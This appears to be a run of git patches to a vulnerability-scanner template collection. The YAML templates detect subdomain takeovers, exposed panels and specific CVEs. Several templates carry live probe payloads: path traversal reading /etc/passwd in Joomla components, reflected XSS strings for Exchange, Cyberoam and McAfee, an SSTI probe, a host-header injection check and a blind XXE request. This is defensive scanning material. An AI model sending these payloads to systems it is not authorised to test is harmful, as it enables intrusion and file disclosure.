https://github.com/EdOverflow/can-i-take-over-xyz/issues/228 requests: - method: GET raw: - | - GET / HTTP/2 + GET / HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 redirects: true @@ -25,4 +27,4 @@ requests: - type: status status: - - 404 \ No newline at end of file + - 404 From e9ddcbd91530b9c4324358107b21c7e83b8b7447 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 16 Aug 2021 22:29:39 +0530 Subject: [PATCH 1675/4083] Update announcekit-takeover.yaml --- takeovers/announcekit-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/announcekit-takeover.yaml b/takeovers/announcekit-takeover.yaml index 4c1d94ede7..af4406b2bb 100644 --- a/takeovers/announcekit-takeover.yaml +++ b/takeovers/announcekit-takeover.yaml @@ -24,7 +24,7 @@ requests: - type: word words: - 'Error 404 - AnnounceKit' - + - type: status status: - 404 From 820b9baf87585ad63cdef430c1fd4fa5a5a7a4e7 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 16 Aug 2021 23:03:21 +0530 Subject: [PATCH 1676/4083] minor update --- takeovers/announcekit-takeover.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/takeovers/announcekit-takeover.yaml b/takeovers/announcekit-takeover.yaml index af4406b2bb..dcf76b07c1 100644 --- a/takeovers/announcekit-takeover.yaml +++ b/takeovers/announcekit-takeover.yaml @@ -1,10 +1,10 @@ -id: announcekit-tk +id: announcekit-takeover info: name: Announcekit Takeover Detection author: melbadry9 severity: high - tags: takeover + tags: takeover,announcekit reference: | - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228 @@ -14,6 +14,7 @@ requests: raw: - | GET / HTTP/1.1 + Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 redirects: true From 9308393ead203bad2444fe016d888b29b7a34c07 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 16 Aug 2021 23:11:35 +0530 Subject: [PATCH 1677/4083] Added DNS fingerprint --- ...ice-detector.yaml => cname-service-detection.yaml} | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) rename dns/{cname-service-detector.yaml => cname-service-detection.yaml} (68%) diff --git a/dns/cname-service-detector.yaml b/dns/cname-service-detection.yaml similarity index 68% rename from dns/cname-service-detector.yaml rename to dns/cname-service-detection.yaml index fe586cd0ce..dea6bbb752 100644 --- a/dns/cname-service-detector.yaml +++ b/dns/cname-service-detection.yaml @@ -1,7 +1,7 @@ -id: cname-service-detector +id: cname-service-detection info: - name: 3rd party service checker + name: cname service detection author: pdteam severity: info tags: dns @@ -12,13 +12,20 @@ dns: class: inet recursion: true retries: 5 + matchers-condition: or matchers: - type: word name: zendesk words: - "zendesk.com" + - type: word name: github words: - "github.io" + + - type: word + name: announcekit + words: + - "cname.announcekit.app" \ No newline at end of file From 8fa76f68f69d1d04559692eba51d2f738cc98d70 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 17 Aug 2021 02:18:49 +0700 Subject: [PATCH 1678/4083] Add CVE-2021-38751 --- cves/2021/CVE-2021-38751.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2021/CVE-2021-38751.yaml diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml new file mode 100644 index 0000000000..abba46bdb9 --- /dev/null +++ b/cves/2021/CVE-2021-38751.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-38751 + +info: + name: ExponentCMS <= 2.6 Host Header Injection + author: dwisiswant0 + severity: medium + description: | + A HTTP Host header attack exists in ExponentCMS 2.6 + and below in /exponent_constants.php. A modified HTTP + header can change links on the webpage to an arbitrary value, + leading to a possible attack vector for MITM. + reference: | + - https://github.com/exponentcms/exponent-cms/issues/1544 + - https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64 + tags: cve,cve2021,exponentcms + +requests: + - method: GET + path: + - "{{BaseURL}}/" + headers: + Host: "{{interactsh-url}}" + matchers: + - type: word + words: + - "{{interactsh-url}}" + part: body From d52c97c56932449ce3c3f7e8e30b58862892988e Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 16 Aug 2021 15:28:13 -0500 Subject: [PATCH 1679/4083] Update twig-php-ssti.yaml False positive fix --- vulnerabilities/other/twig-php-ssti.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/vulnerabilities/other/twig-php-ssti.yaml b/vulnerabilities/other/twig-php-ssti.yaml index 73f0313c0a..dd60a057f7 100644 --- a/vulnerabilities/other/twig-php-ssti.yaml +++ b/vulnerabilities/other/twig-php-ssti.yaml @@ -10,8 +10,14 @@ requests: - method: GET path: - "{{BaseURL}}/search?search_key={{1337*1338}}" + + matchers-condition: and matchers: - type: word words: - "1788906" part: body + - type: status + status: + - 404 + negative: true From 3b9fb75fcbfdfbe8ef5ac4d960e3d4d9069afb12 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 16 Aug 2021 15:30:23 -0500 Subject: [PATCH 1680/4083] Update twig-php-ssti.yaml Another FP fix --- vulnerabilities/other/twig-php-ssti.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/twig-php-ssti.yaml b/vulnerabilities/other/twig-php-ssti.yaml index dd60a057f7..8b113641a5 100644 --- a/vulnerabilities/other/twig-php-ssti.yaml +++ b/vulnerabilities/other/twig-php-ssti.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/search?search_key={{1337*1338}}" + - "{{BaseURL}}/search?search_key=%7B%7B1337*1338%7D%7D" matchers-condition: and matchers: From 9d8c364040b68af08496df3f9e84b575f2706ae6 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 16 Aug 2021 15:45:09 -0500 Subject: [PATCH 1681/4083] =?UTF-8?q?Create=20CVE-2017=E2=80=934011.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2017/CVE-2017–4011.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2017/CVE-2017–4011.yaml diff --git a/cves/2017/CVE-2017–4011.yaml b/cves/2017/CVE-2017–4011.yaml new file mode 100644 index 0000000000..3ab8bb6176 --- /dev/null +++ b/cves/2017/CVE-2017–4011.yaml @@ -0,0 +1,30 @@ +id: CVE-2017–4011 + +info: + name: McAfee NDLP User-Agent XSS + description: McAfee Network Data Loss Prevention (NDLP) 9.3.x allows remote attackers to get session/cookie information via modification of the HTTP request. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011 + - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 + - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab + author: geeknik + severity: medium + tags: cve,cve2017,mcafee,ndlp,xss + +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);// + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//" + - type: word + part: header + words: + - "text/html" From 61d1543cc53d093f152617ff0edd8d594db0ae39 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 17 Aug 2021 07:09:28 +0700 Subject: [PATCH 1682/4083] Create CVE-2010-1722.yaml --- cves/2010/CVE-2010-1722.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1722.yaml diff --git a/cves/2010/CVE-2010-1722.yaml b/cves/2010/CVE-2010-1722.yaml new file mode 100644 index 0000000000..50d09c0704 --- /dev/null +++ b/cves/2010/CVE-2010-1722.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1722 + +info: + name: Joomla! Component Online Market 2.x - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12177 + - https://www.cvedetails.com/cve/CVE-2010-1722 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 09189f7cfb8f5da14d5e7387f6ba2a158de42105 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 17 Aug 2021 07:16:08 +0700 Subject: [PATCH 1683/4083] Create CVE-2010-1953.yaml --- cves/2010/CVE-2010-1953.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1953.yaml diff --git a/cves/2010/CVE-2010-1953.yaml b/cves/2010/CVE-2010-1953.yaml new file mode 100644 index 0000000000..171fc4a085 --- /dev/null +++ b/cves/2010/CVE-2010-1953.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1953 + +info: + name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12288 + - https://www.cvedetails.com/cve/CVE-2010-1953 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 5072dbbcbb28ff8a57797316bda5fd748e65f8b9 Mon Sep 17 00:00:00 2001 From: Sanyam Chawla <45365465+infosecsanyam261@users.noreply.github.com> Date: Tue, 17 Aug 2021 13:55:38 +0530 Subject: [PATCH 1684/4083] Create ms-exchange-server-reflected-xss.yaml --- .../ms-exchange-server-reflected-xss.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/other/ms-exchange-server-reflected-xss.yaml diff --git a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml new file mode 100644 index 0000000000..8b978d6484 --- /dev/null +++ b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml @@ -0,0 +1,28 @@ +id: ms-exchange-server-reflected-xss + +info: + name: MS Exchange Server XSS ( + author: infosecsanyam + severity: high + description: | + Microsoft Exchange Server XSS. + reference: | + - https://www.shodan.io/search?query=http.title%3A%22Outlook%22 + tags: exchangeserver,owa,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//' + + matchers-condition: and + matchers: + - type: word + words: + - 'alert(document.domain)//' + condition: or + + - type: status + status: + - 500 + From e8c3a1f9c7b93ee783729d3989815dcb9ae6b844 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 17 Aug 2021 15:00:05 +0530 Subject: [PATCH 1685/4083] Additional matchers update --- .../other/ms-exchange-server-reflected-xss.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml index 8b978d6484..2d85d7d690 100644 --- a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml +++ b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml @@ -1,14 +1,13 @@ id: ms-exchange-server-reflected-xss info: - name: MS Exchange Server XSS ( + name: MS Exchange Server XSS author: infosecsanyam severity: high - description: | - Microsoft Exchange Server XSS. reference: | - https://www.shodan.io/search?query=http.title%3A%22Outlook%22 - tags: exchangeserver,owa,xss + - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html + tags: miscrsoft,owa,xss requests: - method: GET @@ -20,9 +19,14 @@ requests: - type: word words: - 'alert(document.domain)//' - condition: or + - 'Microsoft Corporation' + condition: and - type: status status: - 500 + - type: word + words: + - "text/html" + part: header \ No newline at end of file From 4a5137b742f36a7603ade9174c2f2dcf6c0c843b Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 17 Aug 2021 15:00:30 +0530 Subject: [PATCH 1686/4083] more tags --- vulnerabilities/other/ms-exchange-server-reflected-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml index 2d85d7d690..36c601b0f6 100644 --- a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml +++ b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml @@ -7,7 +7,7 @@ info: reference: | - https://www.shodan.io/search?query=http.title%3A%22Outlook%22 - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html - tags: miscrsoft,owa,xss + tags: miscrsoft,exchange,owa,xss requests: - method: GET From 03cd55a33ffa66538fda972a479525928bbbaee0 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 17 Aug 2021 15:02:47 +0530 Subject: [PATCH 1687/4083] severity update based on poc We will update this again as per assigned CVE which is not available right now? --- vulnerabilities/other/ms-exchange-server-reflected-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml index 36c601b0f6..3694bb9c58 100644 --- a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml +++ b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml @@ -3,7 +3,7 @@ id: ms-exchange-server-reflected-xss info: name: MS Exchange Server XSS author: infosecsanyam - severity: high + severity: medium reference: | - https://www.shodan.io/search?query=http.title%3A%22Outlook%22 - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html From c2f87671fb135be8ffb516a7e36ff3ca53ab809a Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 17 Aug 2021 15:52:22 +0530 Subject: [PATCH 1688/4083] strict matcher --- vulnerabilities/other/ms-exchange-server-reflected-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml index 3694bb9c58..654cd03d19 100644 --- a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml +++ b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml @@ -18,8 +18,8 @@ requests: matchers: - type: word words: - - 'alert(document.domain)//' - - 'Microsoft Corporation' + - 'alert(document.domain)//&et=ServerError' + - 'mail/bootr.ashx' condition: and - type: status From 3a030cca66c190cbbc14e454a6a5628cec6fea8e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 17 Aug 2021 17:01:34 +0530 Subject: [PATCH 1689/4083] =?UTF-8?q?Update=20CVE-2017=E2=80=934011.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2017/CVE-2017–4011.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/cves/2017/CVE-2017–4011.yaml b/cves/2017/CVE-2017–4011.yaml index 3ab8bb6176..a36bc6ec8d 100644 --- a/cves/2017/CVE-2017–4011.yaml +++ b/cves/2017/CVE-2017–4011.yaml @@ -2,14 +2,14 @@ id: CVE-2017–4011 info: name: McAfee NDLP User-Agent XSS - description: McAfee Network Data Loss Prevention (NDLP) 9.3.x allows remote attackers to get session/cookie information via modification of the HTTP request. - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011 - - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 - - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab author: geeknik severity: medium - tags: cve,cve2017,mcafee,ndlp,xss + description: McAfee Network Data Loss Prevention (NDLP) 9.3.x allows remote attackers to get session/cookie information via modification of the HTTP request. + reference: + - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab + - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011 + tags: cve,cve2017,mcafee,xss requests: - method: GET @@ -24,6 +24,7 @@ requests: part: body words: - "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//" + - type: word part: header words: From beb11d77e3828384a21b1aa0379483068f81bb15 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 17 Aug 2021 17:05:12 +0530 Subject: [PATCH 1690/4083] Update CVE-2021-32030.yaml --- cves/2021/CVE-2021-32030.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-32030.yaml b/cves/2021/CVE-2021-32030.yaml index 95ec6c5a05..b0db1c2b47 100644 --- a/cves/2021/CVE-2021-32030.yaml +++ b/cves/2021/CVE-2021-32030.yaml @@ -2,11 +2,10 @@ id: CVE-2021-32030 info: name: ASUS GT-AC2900 - Authentication Bypass - description: The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations. author: gy741 severity: high - reference: | - - https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass + description: The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations. + reference: https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass tags: cve,cve2021,asus,auth-bypass,router requests: From ec9b83bd1f81f1a032b7f5cc6f544cd4c4aa9a09 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 17 Aug 2021 17:12:51 +0530 Subject: [PATCH 1691/4083] Update CVE-2021-38751.yaml --- cves/2021/CVE-2021-38751.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml index abba46bdb9..860761a986 100644 --- a/cves/2021/CVE-2021-38751.yaml +++ b/cves/2021/CVE-2021-38751.yaml @@ -19,9 +19,15 @@ requests: path: - "{{BaseURL}}/" headers: - Host: "{{interactsh-url}}" + Host: "{{randstr}}.com" matchers: - type: word words: - - "{{interactsh-url}}" + - '' + - '' part: body + condition: or + + - type: status + status: + - 200 From 7bb40042a3f2585d6fee296270be91cff20a695b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 17 Aug 2021 17:13:45 +0530 Subject: [PATCH 1692/4083] Update CVE-2021-38751.yaml --- cves/2021/CVE-2021-38751.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml index 860761a986..5a72faa37d 100644 --- a/cves/2021/CVE-2021-38751.yaml +++ b/cves/2021/CVE-2021-38751.yaml @@ -20,6 +20,8 @@ requests: - "{{BaseURL}}/" headers: Host: "{{randstr}}.com" + + matchers-condition: and matchers: - type: word words: From c39f0e2077f72382c132072f95cde6061d0b25e5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 17 Aug 2021 17:18:52 +0530 Subject: [PATCH 1693/4083] Create generic-blind-xxe.yaml --- .../generic/generic-blind-xxe.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/generic/generic-blind-xxe.yaml diff --git a/vulnerabilities/generic/generic-blind-xxe.yaml b/vulnerabilities/generic/generic-blind-xxe.yaml new file mode 100644 index 0000000000..4d7cb40f23 --- /dev/null +++ b/vulnerabilities/generic/generic-blind-xxe.yaml @@ -0,0 +1,32 @@ +id: generic-blind-xxe + +info: + name: Generic Blind XXE + author: geeknik + severity: high + tags: xxe,generic + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip,deflate + Referer: {{BaseURL}} + Content-Type: text/xml + Content-Length: 112 + Connection: close + + + + &e1; + redirects: true + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" From f33d1641797bebff130a77b632842d56a9ddda2e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 17 Aug 2021 17:29:53 +0530 Subject: [PATCH 1694/4083] Create tracer-sc-login.yaml --- exposed-panels/tracer-sc-login.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposed-panels/tracer-sc-login.yaml diff --git a/exposed-panels/tracer-sc-login.yaml b/exposed-panels/tracer-sc-login.yaml new file mode 100644 index 0000000000..7a9f3e9d93 --- /dev/null +++ b/exposed-panels/tracer-sc-login.yaml @@ -0,0 +1,28 @@ +id: tracer-sc-login + +info: + name: Tracer SC login panel + author: geeknik + severity: info + reference: https://www.trane.com/commercial/north-america/us/en/products-systems/building-management---automation/building-automation-systems/tracer-sc-plus.html + tags: tracer,trane,iot,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/hui/index.html" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Tracer SC" + + - type: word + part: header + words: + - "text/html" From 5e55dc1e242d1c9ec6f547d9a91ca3d8daba540c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 17 Aug 2021 17:37:57 +0530 Subject: [PATCH 1695/4083] Create django-debug-exposure.yaml --- exposures/logs/django-debug-exposure.yaml | 28 +++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposures/logs/django-debug-exposure.yaml diff --git a/exposures/logs/django-debug-exposure.yaml b/exposures/logs/django-debug-exposure.yaml new file mode 100644 index 0000000000..5a47ffdc6d --- /dev/null +++ b/exposures/logs/django-debug-exposure.yaml @@ -0,0 +1,28 @@ +id: django-debug-exposure + +info: + name: Django Debug Exposure + author: geeknik + reference: https://twitter.com/Alra3ees/status/1397660633928286208 + severity: high + tags: django,exposure + +requests: + - method: POST + path: + - "{{BaseURL}}/admin/login/?next=/admin/" + + matchers-condition: and + matchers: + - type: status + status: + - 500 + + - type: word + part: body + words: + - "DB_HOST" + - "DB_NAME" + - "DJANGO" + - "ADMIN_PASSWORD" + condition: and From 727e73c5c3ffc84492e26947296988dabbab3f05 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 17 Aug 2021 18:02:41 +0530 Subject: [PATCH 1696/4083] Create solar-log-authbypass.yaml --- .../other/solar-log-authbypass.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/other/solar-log-authbypass.yaml diff --git a/vulnerabilities/other/solar-log-authbypass.yaml b/vulnerabilities/other/solar-log-authbypass.yaml new file mode 100644 index 0000000000..382d65e232 --- /dev/null +++ b/vulnerabilities/other/solar-log-authbypass.yaml @@ -0,0 +1,32 @@ +id: solar-log-authbypass + +info: + name: Solar-Log 500 2.8.2 - Incorrect Access Control + author: geeknik + severity: high + description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers> + reference: https://www.exploit-db.com/exploits/49986 + tags: solarlog,auth-bypass + +requests: + - method: GET + path: + - "{{BaseURL}}/lan.html" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "IPC@CHIP" + + - type: word + part: body + words: + - " Solare Datensysteme GmbH" + - "mailto:info@solar-log.com" + condition: and From 438c0f647320485a9fb590eb76174728fa3528d0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 17 Aug 2021 18:17:25 +0530 Subject: [PATCH 1697/4083] Create tectuus-scada-monitor.yaml --- exposed-panels/tectuus-scada-monitor.yaml | 26 +++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/tectuus-scada-monitor.yaml diff --git a/exposed-panels/tectuus-scada-monitor.yaml b/exposed-panels/tectuus-scada-monitor.yaml new file mode 100644 index 0000000000..8bde66d3f5 --- /dev/null +++ b/exposed-panels/tectuus-scada-monitor.yaml @@ -0,0 +1,26 @@ +id: tectuus-scada-monitor + +info: + name: Tectuus SCADA Monitor + author: geeknik + severity: info + reference: https://www.tectuus.mx/ + tags: panel,tectuus,scada + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "SCADAmonitor" + part: body From 888c9a457312cfc3e3bf16f73c2b90b272e16d8c Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 17 Aug 2021 08:11:02 -0500 Subject: [PATCH 1698/4083] Create CVE-2021-38702.yaml --- cves/2021/CVE-2021-38702.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2021/CVE-2021-38702.yaml diff --git a/cves/2021/CVE-2021-38702.yaml b/cves/2021/CVE-2021-38702.yaml new file mode 100644 index 0000000000..a662c79f19 --- /dev/null +++ b/cves/2021/CVE-2021-38702.yaml @@ -0,0 +1,24 @@ +id: CVE-2021-38702 + +info: + name: Cyberoam NetGenie XSS + description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php. + reference: https://seclists.org/fulldisclosure/2021/Aug/20 + author: geeknik + severity: medium + tags: cve,cve2021,cyberoam,netgenie,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/tweb/ft.php?u=" + + matchers-condition: and + matchers: + - type: word + words: + - "" + - type: word + words: + - "text/html" + part: header From f021817d654e6c93bb48ad0c380d617671fe04be Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 17 Aug 2021 22:06:37 +0530 Subject: [PATCH 1699/4083] Update CVE-2021-38702.yaml --- cves/2021/CVE-2021-38702.yaml | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-38702.yaml b/cves/2021/CVE-2021-38702.yaml index a662c79f19..c17a52845f 100644 --- a/cves/2021/CVE-2021-38702.yaml +++ b/cves/2021/CVE-2021-38702.yaml @@ -2,23 +2,28 @@ id: CVE-2021-38702 info: name: Cyberoam NetGenie XSS - description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php. - reference: https://seclists.org/fulldisclosure/2021/Aug/20 author: geeknik severity: medium - tags: cve,cve2021,cyberoam,netgenie,xss + description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php. + reference: https://seclists.org/fulldisclosure/2021/Aug/20 + tags: cve,cve2021,cyberoam,netgenie,xss,router requests: - method: GET path: - - "{{BaseURL}}/tweb/ft.php?u=" + - "{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" + - type: word words: - "text/html" part: header + + - type: status + status: + - 200 From 9850ced093957a092f6c246319a888930fafb760 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 17 Aug 2021 22:11:28 +0530 Subject: [PATCH 1700/4083] strict matchers --- .../configs/kubernetes-kustomization-disclosure.yaml | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/exposures/configs/kubernetes-kustomization-disclosure.yaml b/exposures/configs/kubernetes-kustomization-disclosure.yaml index 3d11c2d40d..c7ac644556 100644 --- a/exposures/configs/kubernetes-kustomization-disclosure.yaml +++ b/exposures/configs/kubernetes-kustomization-disclosure.yaml @@ -24,12 +24,9 @@ requests: - "commonLabels:" - "Kustomization" - - type: word - part: body - condition: or - words: - - "yaml" - - "yml" + - type: dsl + dsl: + - "contains(tolower(all_headers), 'application/yaml')" - type: status status: From 5c994cfad68c546fdc720b7158bbb36c4b2389a5 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 17 Aug 2021 11:52:31 -0500 Subject: [PATCH 1701/4083] Update general-tokens.yaml I believe this might work. --- exposures/tokens/generic/general-tokens.yaml | 2 +- 1 